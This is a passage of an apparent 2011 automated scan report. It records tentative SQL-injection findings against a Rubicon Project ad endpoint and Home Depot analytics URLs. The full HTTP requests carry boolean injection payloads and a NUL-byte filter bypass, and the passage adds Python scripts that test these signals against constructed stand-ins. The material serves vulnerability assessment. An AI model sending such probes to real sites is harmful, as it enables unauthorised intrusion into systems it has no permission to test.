GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^520978879'%20or%201%3d1--%20; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:12:08 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 13:12:08 GMT; Path=/
Set-Cookie: dq=27|4|23|0; Expires=Fri, 15-Jun-2012 13:12:08 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=14&k=southern+union:336,energy+transfer:320,buy+southern:184,4+billion:144,current+datetime:136,linkslist+documentid:136,cnbc:118,energy:114,union:86,billion+cnbc:80,southern:72,transfer:72,please+respect:64,related+links:64,cnbc+welcomes:64,posted+yet:64,cnbc+highlights:64,must+click:64,cnbc+reserves:64,datetime+05:56,2011:56,asia+pacific:56,2011+5:48,5+36:48,6+16:48,expiration+datetime:48,16+2011:48,special+reports:48,datetime+6:48,datetime:46,billion:46,will+benefit:40,energy+news:40,equity+will:40,burgeoning+u:40,union+company:40,gas+production:40,transfer+equity:40,datetime+11:40,midstream+company:40,&t=Energy+Transfer+to+Buy+Southern+Union+for+$4.4+Billion+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1; cd=false; dq=21|4|17|0; rdk2=0; ses2=11953^520978879'%20or%201%3d2--%20; csi2=3187870.js^4^1308226504^1308227750&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^10; csi15=3187871.js^7^1308225219^1308227751&3206204.js^3^1308225202^1308227128

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 13:12:08 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.36. http://tap.rubiconproject.com/oz/sensor [xt parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The xt parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the xt parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19%20and%201%3d1--%20&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 1

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:26 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Fri, 15-Jun-2012 11:27:26 GMT; Path=/
Set-Cookie: dq=12|4|8|0; Expires=Fri, 15-Jun-2012 11:27:26 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6451/11953&cd=false&xt=19%20and%201%3d2--%20&k=foreclosure+activity:192,real+estate:192,activity+falls:176,current+datetime:144,linkslist+documentid:144,cnbc:106,foreclosure:98,11+21:88,datetime+11:88,yet+cnbc:80,activity+fall:72,posted+yet:64,must+click:64,cnbc+welcomes:64,featured+real:64,estate+stories:64,related+links:64,please+respect:64,cnbc+reserves:64,21+58:56,58+15:56,asia+pacific:56,2011:56,activity:54,market:48,datetime:46,special+reports:40,housing+market:40,datetime+04:40,datetime+6:40,16+2011:40,2011+4:40,04+24:40,6+16:40,4+27:40,new+push:40,big+banks:40,albeit+still:40,nation's+real:40,estate+market:40,&t=Foreclosure+Activity+Falls,+but+the+Worst+Isn't+Over+Yet+-+CNBC HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; xdp_ti="13 Jun 2011 11:13:38 GMT"; lm="13 Jun 2011 11:13:38 GMT"; cd=false; dq=9|4|5|0; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1%264214%3D1; put_1197=3460050161923843111

Response 2

HTTP/1.1 204 No Content
Date: Thu, 16 Jun 2011 11:27:26 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
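Findings 1.32 to 1.36 above all rest on the same signal. In each pair, Response 1 carries p3p, Expires, Cache-Control: no-cache and Set-Cookie refreshes for cd and dq, while Response 2 does not; both are 204 No Content with Content-Length: 0. A header-only difference of that shape is exactly what a second backend node or a state-dependent cookie refresh would also produce, which is why the scanner rates the confidence Tentative and asks for manual review. The script below is an added example, not code from this report or from the scanner that produced it. It runs the report's own true/false payload pair against two constructed stand-ins for /oz/sensor: one whose response shape alternates independently of the cookie value, and one that really concatenates the cookie into a query. Before comparing, it learns which headers vary between identical baseline requests and repeats the pair several times, so only a consistent true/false oracle is reported as confirmed. The endpoints, the sqlite schema and the cookie values are all constructed for the example.

```python
import sqlite3
from typing import Callable, Dict, List, Set, Tuple
from urllib.parse import unquote

Response = Tuple[int, List[Tuple[str, str]], bytes]   # status, headers, body

# The exact payload pair the report submitted in the rdk15 cookie (finding 1.32).
PAYLOAD_TRUE = unquote("%20and%201%3d1--%20")    # " and 1=1-- "
PAYLOAD_FALSE = unquote("%20and%201%3d2--%20")   # " and 1=2-- "


def fingerprint(resp: Response) -> Dict[str, str]:
    """Flatten a response into comparable keys; repeated headers (Set-Cookie) are joined."""
    status, headers, body = resp
    fp = {"status": str(status), "body": body.decode("latin-1", "replace")}
    for name, value in headers:
        key = name.lower()
        fp[key] = fp.get(key, "") + value + "\n"
    return fp


def volatile_keys(samples: List[Dict[str, str]]) -> Set[str]:
    """Keys whose value (or presence) changes across unmodified baseline requests."""
    keys = set().union(*samples)
    return {k for k in keys if len({s.get(k) for s in samples}) > 1}


def project(fp: Dict[str, str], volatile: Set[str]) -> Dict[str, str]:
    return {k: v for k, v in fp.items() if k not in volatile}


def naive_pair_differs(send: Callable[[str], Response], base: str,
                       true_payload: str, false_payload: str) -> bool:
    """One true request, one false request, compare everything but Date:
    the bare signal a differential test is built on."""
    t = project(fingerprint(send(base + true_payload)), {"date"})
    f = project(fingerprint(send(base + false_payload)), {"date"})
    return t != f


def boolean_sqli_check(send: Callable[[str], Response], base: str,
                       true_payload: str, false_payload: str,
                       baselines: int = 4, rounds: int = 3) -> str:
    """Return 'confirmed', 'clean' or 'noise'.

    A real boolean oracle must hold in every round: the true condition looks
    exactly like the unmodified request and the false condition does not,
    once headers that vary between identical baseline requests are ignored.
    """
    base_fps = [fingerprint(send(base)) for _ in range(baselines)]
    volatile = volatile_keys(base_fps)
    baseline = project(base_fps[0], volatile)
    verdicts = []
    for _ in range(rounds):
        t = project(fingerprint(send(base + true_payload)), volatile)
        f = project(fingerprint(send(base + false_payload)), volatile)
        verdicts.append((t == baseline, f != baseline))
    if all(t and f for t, f in verdicts):
        return "confirmed"
    if all(t and not f for t, f in verdicts):
        return "clean"
    return "noise"   # differences seen, but not consistent with a true/false oracle


class NoisySensor:
    """Constructed model of /oz/sensor behind two nodes: one refreshes cd/dq and
    sends p3p (Response 1 on the page), the other does not (Response 2).
    Which node answers alternates per request and ignores the cookie value."""
    def __init__(self) -> None:
        self.n = 0

    def __call__(self, rdk15: str) -> Response:
        self.n += 1
        headers = [("Date", f"Thu, 16 Jun 2011 13:12:{self.n % 60:02d} GMT"),
                   ("Server", "TRP Apache-Coyote/1.1")]
        if self.n % 2 == 0:
            headers += [("p3p", 'CP="NOI CURa ADMa DEVa"'),
                        ("Set-Cookie", "cd=false; Domain=.rubiconproject.com; Path=/"),
                        ("Set-Cookie", "dq=27|4|23|0; Path=/")]
        headers += [("Set-Cookie", "SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/"),
                    ("Content-Length", "0")]
        return 204, headers, b""


class InjectableSensor:
    """Constructed endpoint with the bug the report suspects: the cookie is
    concatenated into SQL, and a matching row shows up as a dq cookie refresh."""
    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE rdk (id INTEGER PRIMARY KEY, dq TEXT)")
        self.db.execute("INSERT INTO rdk VALUES (0, '27|4|23|0')")
        self.n = 0

    def __call__(self, rdk15: str) -> Response:
        self.n += 1
        headers = [("Date", f"Fri, 17 Jun 2011 10:11:{self.n % 60:02d} GMT"),
                   ("Server", "TRP Apache-Coyote/1.1")]
        try:   # string concatenation: the vulnerable pattern
            row = self.db.execute("SELECT dq FROM rdk WHERE id = " + rdk15).fetchone()
        except sqlite3.Error:
            row = None
        if row:
            headers.append(("Set-Cookie", f"dq={row[0]}; Path=/"))
        headers += [("Set-Cookie", "SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/"),
                    ("Content-Length", "0")]
        return 204, headers, b""


if __name__ == "__main__":
    for name, sensor in (("noisy", NoisySensor), ("injectable", InjectableSensor)):
        print(name, "naive pair differs:",
              naive_pair_differs(sensor(), "0", PAYLOAD_TRUE, PAYLOAD_FALSE),
              "| verdict:", boolean_sqli_check(sensor(), "0", PAYLOAD_TRUE, PAYLOAD_FALSE))
```

Against both stand-ins a single true/false pair differs, which is all the report's heuristic needs to raise a High/Tentative finding. Only the endpoint that really evaluates the condition survives the repeated, noise-filtered check; the alternating one comes back clean because every header that differed was already differing between unmodified requests. Learning volatility from baselines rather than from a fixed ignore list matters here, because Set-Cookie is both the noise in the noisy case and the oracle in the injectable one.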


1.37. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11473368444548 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s11473368444548

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
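Two things are worth checking by hand before accepting this finding. Response 1 is the web server's own 404 page, and it reports the requested URL as /b/ss/homedepot/1, so the server itself dropped everything from the NUL byte onward; both responses are 404 Not Found rather than a database error. The script below is an added example of the mechanism the remediation note describes, not code from the report or from the scanner. It traces the two path segments the report sent through percent-decoding, a filter that treats its input as a NUL-terminated C string (libc strstr when a C library can be loaded, otherwise the same semantics modelled in Python), a length-aware filter, and a constructed stand-in for the application's quoted-literal query builder that embodies the single-quote / double-quote heuristic the scanner applied. The filters and the query-builder stand-in are assumptions for the example, not the site's code.

```python
import ctypes
import ctypes.util
from typing import Dict
from urllib.parse import unquote_to_bytes

# REST URL parameter 4 of the two requests on the page (path segment after /homedepot/).
REQUEST_1 = "1%00'"     # single quote behind a NUL: a general error came back
REQUEST_2 = "1%00''"    # doubled quote behind a NUL: the error disappeared


def _load_strstr():
    """libc's strstr if a C library can be loaded, else None."""
    try:
        libc = ctypes.CDLL(ctypes.util.find_library("c"))
        fn = libc.strstr
        fn.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
        fn.restype = ctypes.c_void_p          # a NULL result comes back as None
        return fn
    except (OSError, AttributeError, TypeError):
        return None


_STRSTR = _load_strstr()


def native_waf_blocks(raw: bytes) -> bool:
    """Filter written against NUL-terminated C strings, as the remediation note
    describes. Scanning stops at the first NUL, so a quote behind %00 is never
    seen. Real libc strstr when available, the same semantics in Python otherwise."""
    if _STRSTR is not None:
        return _STRSTR(raw, b"'") is not None
    return b"'" in raw.split(b"\x00", 1)[0]


def hardened_waf_blocks(raw: bytes) -> bool:
    """Length-aware filter: inspects every byte and rejects an embedded NUL outright,
    since no legitimate path segment contains one."""
    return b"\x00" in raw or b"'" in raw


def app_query_breaks(segment: bytes) -> bool:
    """Constructed stand-in for an application that splices the decoded segment
    into a quoted SQL literal. An unpaired quote leaves the statement malformed
    (the 'general error'); a doubled quote is a valid escaped quote and the
    statement parses."""
    return b"'" in segment.replace(b"''", b"")


def probe(segment: str) -> Dict[str, bool]:
    """Trace one raw path segment through decoding, both filters and the app."""
    raw = unquote_to_bytes(segment)            # a length-aware decoder keeps the NUL
    return {
        "native_waf_blocks": native_waf_blocks(raw),
        "hardened_waf_blocks": hardened_waf_blocks(raw),
        "app_error": app_query_breaks(raw),
    }


if __name__ == "__main__":
    for seg in (REQUEST_1, REQUEST_2, "1'", "1"):
        print(repr(seg), probe(seg))
```

The native filter lets both of the report's payloads through while the plain `1'` is caught, which is the bypass the note describes; the length-aware filter catches all three. Rejecting the NUL byte at the edge is cheap, but it only closes the bypass, not the bug: the application still has to stop splicing the segment into its query.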

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s11473368444548?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A38%3A53%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:46:51 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s11473368444548?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A38%3A53%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:46:51 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.38. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s11999640008134 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s11999640008134

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s11999640008134%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A56%3A18%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:26:56 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s11999640008134 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s11999640008134%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A56%3A18%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:26:56 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.39. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s12511742944840 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s12511742944840

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s12511742944840?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A54%3A55%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=mostpopular&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:20:43 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

